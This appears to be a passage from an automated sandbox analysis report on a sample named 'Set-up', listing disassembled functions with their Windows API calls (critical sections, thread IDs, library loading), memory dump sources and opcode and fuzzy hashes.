                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00E5C758
                                                                                                                                  • new.LIBCMT ref: 00E5C772
                                                                                                                                    • Part of subcall function 00E5C580: EnterCriticalSection.KERNEL32(0131BE48,460C02D8,00000000), ref: 00E5C5B8
                                                                                                                                    • Part of subcall function 00E5C580: GetCurrentThreadId.KERNEL32 ref: 00E5C5C9
                                                                                                                                    • Part of subcall function 00E5C580: __CxxThrowException@8.LIBVCRUNTIME ref: 00E5C5F3
                                                                                                                                    • Part of subcall function 00E5C580: LeaveCriticalSection.KERNEL32(0131BE48), ref: 00E5C604
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131BE48), ref: 00E5C7DE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$CurrentEnterLeaveThread$Exception@8Throw
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2065089518-0
                                                                                                                                  • Opcode ID: 5d2b69cf33882c2cffd9592b6f7c041a130dc42827cfbf63e5fa6411c566092b
                                                                                                                                  • Instruction ID: e2363d43082fbd730470d965fd756f12d5c8a2840eaf9cae4f3de93a299ae84e
                                                                                                                                  • Opcode Fuzzy Hash: 5d2b69cf33882c2cffd9592b6f7c041a130dc42827cfbf63e5fa6411c566092b
                                                                                                                                  • Instruction Fuzzy Hash: 07212371805289EFC719CFA8D40878DFFF8EF06319F10029AD410A7385D3B52A08CBA1
                                                                                                                                  Function 00E84A10 Relevance: 6.1, APIs: 4, Instructions: 52threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131BE48), ref: 00E84A46
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00E84A57
                                                                                                                                  • new.LIBCMT ref: 00E84A71
                                                                                                                                    • Part of subcall function 00F05960: InitializeCriticalSection.KERNEL32(00000008,00000000,460C02D8,00000000), ref: 00F059A9
                                                                                                                                    • Part of subcall function 00F05960: InitializeCriticalSection.KERNEL32(00000020), ref: 00F059BD
                                                                                                                                    • Part of subcall function 00F05960: GetModuleHandleW.KERNEL32(kernel32.dll,GetSystemTimePreciseAsFileTime), ref: 00F059F1
                                                                                                                                    • Part of subcall function 00F05960: GetProcAddress.KERNEL32(00000000), ref: 00F059F8
                                                                                                                                    • Part of subcall function 00F05960: GetSystemTimeAsFileTime.KERNEL32(00000048), ref: 00F05A09
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131BE48), ref: 00E84ACA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$InitializeTime$AddressCurrentEnterFileHandleLeaveModuleProcSystemThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1387877749-0
                                                                                                                                  • Opcode ID: 3c966ce6d5acfd79567572dec118f05e26a2cf64ceb71096621fb3f22c6ce3b6
                                                                                                                                  • Instruction ID: 9eabd2954f741063b0c501084bd1909a4a0da26a280af30bd7efebfac2122246
                                                                                                                                  • Opcode Fuzzy Hash: 3c966ce6d5acfd79567572dec118f05e26a2cf64ceb71096621fb3f22c6ce3b6
                                                                                                                                  • Instruction Fuzzy Hash: 59112671C05289EFDB25EB68E50939DBBF8EB05718F00019AD818A73C5D7B52A04C7A2
                                                                                                                                  Function 01129E38 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,01129DDF,00000000,00000000,00000000,00000000,?,0112A0BD,00000006,FlsSetValue), ref: 01129E6A
                                                                                                                                  • GetLastError.KERNEL32(?,01129DDF,00000000,00000000,00000000,00000000,?,0112A0BD,00000006,FlsSetValue,011CB13C,011CB144,00000000,00000364,?,01129707), ref: 01129E76
                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,01129DDF,00000000,00000000,00000000,00000000,?,0112A0BD,00000006,FlsSetValue,011CB13C,011CB144,00000000), ref: 01129E84
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3177248105-0
                                                                                                                                  • Opcode ID: 297a1237bcb0bee1188e31af6b6c396d4c8c2f3b0b5d24d9b8b38509ed198f77
                                                                                                                                  • Instruction ID: 97dd498fda5e2b5d966f99f1464104cd7dfe459daffd51342cace2f1668a54ba
                                                                                                                                  • Opcode Fuzzy Hash: 297a1237bcb0bee1188e31af6b6c396d4c8c2f3b0b5d24d9b8b38509ed198f77
                                                                                                                                  • Instruction Fuzzy Hash: CA012B3661123BABD73E5A6CEC84E573B98AF45B65F110630FA16D7144D730E450C7E0
                                                                                                                                  Function 00F13480 Relevance: 6.0, APIs: 4, Instructions: 49threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131BE48), ref: 00F134B6
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00F134C7
                                                                                                                                  • new.LIBCMT ref: 00F134E1
                                                                                                                                    • Part of subcall function 00F12FC0: QueryPerformanceFrequency.KERNEL32(00000000,00000000,00000000), ref: 00F12FDD
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131BE48), ref: 00F13530
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$CurrentEnterFrequencyLeavePerformanceQueryThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 477647683-0
                                                                                                                                  • Opcode ID: bd9200e7fb5153840968754d77404abfe008a086306c3d0ba0c75172ea775f7a
                                                                                                                                  • Instruction ID: 4524786c49ecc0e3d61fc29ebf50d86e530f61ecd54a04252f4a2a6e23a4be86
                                                                                                                                  • Opcode Fuzzy Hash: bd9200e7fb5153840968754d77404abfe008a086306c3d0ba0c75172ea775f7a
                                                                                                                                  • Instruction Fuzzy Hash: F711C471C0A289DFDB25DFA8D50979DBFF8EF05718F10019AE414A7389C7B52A44C7A2
                                                                                                                                  Function 00F13300 Relevance: 6.0, APIs: 4, Instructions: 44threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131BE48,460C02D8,00000000), ref: 00F13338
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00F13349
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00F13373
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131BE48), ref: 00F13384
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$CurrentEnterExceptionException@8LeaveRaiseThreadThrow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2345913246-0
                                                                                                                                  • Opcode ID: c73797d92c0a89e3d8b13a98985883f341c9d868fab1df29216f0f8810bd6c5a
                                                                                                                                  • Instruction ID: 9bcf0ffa00db939142430bc27d9fdac7b531078a38801d13923f42b4e76bd8ff
                                                                                                                                  • Opcode Fuzzy Hash: c73797d92c0a89e3d8b13a98985883f341c9d868fab1df29216f0f8810bd6c5a
                                                                                                                                  • Instruction Fuzzy Hash: 5C115E71905259DFCB15DFA8D845B9DBBF8FB09714F00066AE525E3384DBB46604CBA0
                                                                                                                                  Function 00E675E0 Relevance: 6.0, APIs: 4, Instructions: 44threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131BE48,460C02D8,?), ref: 00E67618
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00E67629
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E67653
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131BE48), ref: 00E67664
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$CurrentEnterExceptionException@8LeaveRaiseThreadThrow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2345913246-0
                                                                                                                                  • Opcode ID: 5381a779739f4028d1d407bd30336b21ed723e9052a5fa981489a9a3a1805d6d
                                                                                                                                  • Instruction ID: c05182ac0c1a1a1410bfbb65ec741a801fabcb1e23a0cf94f737a642621a4940
                                                                                                                                  • Opcode Fuzzy Hash: 5381a779739f4028d1d407bd30336b21ed723e9052a5fa981489a9a3a1805d6d
                                                                                                                                  • Instruction Fuzzy Hash: 0F11AD71904289DFCB15DFA8D809B9EBBF8FB09714F00066AE425F3384D7B46604CBA0
                                                                                                                                  Function 00E5C580 Relevance: 6.0, APIs: 4, Instructions: 44threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131BE48,460C02D8,00000000), ref: 00E5C5B8
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00E5C5C9
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5C5F3
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131BE48), ref: 00E5C604
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$CurrentEnterExceptionException@8LeaveRaiseThreadThrow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2345913246-0
                                                                                                                                  • Opcode ID: 5f931fa1750f0895cfacca5e7ebc661c2e17239c2fff21a6b89c6b69cfc94ff4
                                                                                                                                  • Instruction ID: 2c1a9dcb007a1a4f89d2d88cdc76b56299928c551c41a0f50148f901f149a700
                                                                                                                                  • Opcode Fuzzy Hash: 5f931fa1750f0895cfacca5e7ebc661c2e17239c2fff21a6b89c6b69cfc94ff4
                                                                                                                                  • Instruction Fuzzy Hash: 7711A171904249DFCB14DFA8D805B9DBBF8FB09714F00066AE821F3384D7B46604CBA0
                                                                                                                                  Function 00E709C0 Relevance: 6.0, APIs: 4, Instructions: 44threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131BE48,460C02D8), ref: 00E709F8
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00E70A09
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E70A33
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131BE48), ref: 00E70A44
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$CurrentEnterExceptionException@8LeaveRaiseThreadThrow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2345913246-0
                                                                                                                                  • Opcode ID: ac388aa530ad62b960e20b6b91a04335315d96c09804d3ab4e5c508b431099a2
                                                                                                                                  • Instruction ID: bd4dcc4f29918680de97abb79119826033343e0bae93c1192eee47a4b652269f
                                                                                                                                  • Opcode Fuzzy Hash: ac388aa530ad62b960e20b6b91a04335315d96c09804d3ab4e5c508b431099a2
                                                                                                                                  • Instruction Fuzzy Hash: 28116171904259DFCB15DFA8D845B9DFBF8FB09714F00466AE425E3384D7B46504CBA1
                                                                                                                                  Function 01027890 Relevance: 6.0, APIs: 4, Instructions: 44threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131BE48,460C02D8,00000000), ref: 010278C8
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 010278D9
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 01027903
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131BE48), ref: 01027914
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
